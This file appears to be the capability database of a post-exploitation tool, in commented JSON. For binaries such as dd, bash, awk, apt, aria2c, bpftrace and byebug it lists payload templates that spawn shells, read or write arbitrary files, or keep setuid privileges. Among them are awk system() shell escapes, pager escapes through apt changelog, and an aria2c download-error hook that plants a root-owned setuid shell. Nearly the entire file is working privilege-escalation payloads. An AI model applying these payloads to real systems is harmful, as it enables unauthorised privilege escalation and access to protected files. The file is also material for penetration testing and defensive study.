
{
// Each item is a list of capabilities for this binary
"dd": [
{
// This is a read capability
"type": "read",
// No other commands need to be executed besides the command
// "command" expands to the binary path and any arguments provided
// If the data needs to be dealt with earlier, you can use "{data}"
// here.
"payload": "{command} 2>/dev/null",
// This is used to pass arguments to the application (auto-merged
// into "{command}").
"args": ["if={lfile}"],
// Prepends arguments, if any, to the "args" for setuid context.
"suid": [],
// Input which needs to be passed to the application. All insertions
// work here (such as {lfile}, {command}), but also {data} if you are
// streaming the data to the remote application.
"input": "",
// If needed, specify some data that must be sent to exit the remote
// application after the read is finished.
// "exit": "{ctrl_c}",
// This specifies how to handle the data. There can be a few
// different values here:
// - raw -> the data is unchanged and the controlling terminal
// is set to raw mode for effective reading. This mode
// requires a known data length and the command will fail
// without it.
// - print -> the data is unchanged, but the controlling
// terminal is not changed to raw mode. Only printable
// data is safe from TTY translation.
// - base64 -> all data is converted from base64. Data sent
// to the remote process should be in base64 form, and the
// tty is not set to raw mode.
// - hex -> same as base64, but base16 instead.
"stream": "raw"
},
{
"type": "write",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}", "iflag=count_bytes,fullblock", "count={length}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} 2>/dev/null",
"args": ["of={lfile}"],
"exit": "{ctrl_d}"
}
],
// Another example
"bash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-c", "'{cat} {lfile}'"],
"suid": ["-p"]
},
{
"type": "write",
"stream": "base64",
"payload": "{command}",
"args": ["-c", "'{base64} -d > {lfile}'"],
"suid": ["-p"],
"exit": "{ctrl_d}{ctrl_d}"
}
],
"dash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
},
{
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_d}"
}
],
"cat": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile}"
}
],
"apt": [
{
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"apt-get": [
{
"type": "shell",
"args": ["changelog", "apt"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"aria2c": [
{
"type": "shell",
"payload": "export TF=$({mktemp}); export SH=$({mktemp}); {cp} {shell} $SH; echo \"{chown} root:root $SH; {chmod} +sx $SH\" > $TF; {chmod} +x $TF; {command}; sleep 1; $SH -p",
"input": "rm $TF; rm $SH; unset TF; unset $SH;\n",
"args": ["--on-download-error=$TF", "http://x"],
"exit": "exit"
}
],
"ash": [
{
"type": "shell",
"stream": "print",
"suid": ["-p"],
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} -c '{cat} {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
},
{
"type": "write",
"stream": "base64",
"payload": "{command} -c '{base64} -d > {lfile}'",
"suid": ["-p"],
"exit": "{ctrl_c}"
}
],
"awk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while ((getline) > 0){{ print >> LFILE }}'"
]
}
],
"gawk": [
{
"type": "shell",
"payload": "{command} 'BEGIN {{system(\"{shell} -p\")}}'",
"exit": "exit"
},
{
"type": "read",
"stream": "print",
"payload": "{command} // {lfile}"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 'BEGIN {{system(\"{cat} {lfile}\")}}'"
},
{
"type": "write",
"stream": "print",
"args": [
"-v", "LFILE={lfile}",
"'BEGIN {{ printf \"\" > LFILE; while ((getline) > 0){{ print >> LFILE }}'"
]
}
],
"base32": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base32} -d",
"args": []
}
],
"base64": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {base64} -d",
"args": []
}
],
"bpftrace": [
{
"type": "shell",
"args": ["-c", "'{shell} -p'", "-e", "'END {{exit()}}'"],
"suid": ["-p"],
"exit": "exit"
}
],
"busctl": [
{
"type": "shell",
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
"byebug": [
{
"type": "shell",
"payload": "TF=$({mktemp}); echo 'system(\"{shell}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit"
},
{
"type": "read",
"payload": "TF=$({mktemp}); echo 'system(\"{cat} {lfile}\")' > $TF; {command}",
"args": ["--no-stop", "-q", "$TF"],
"exit": "exit"
}
]
}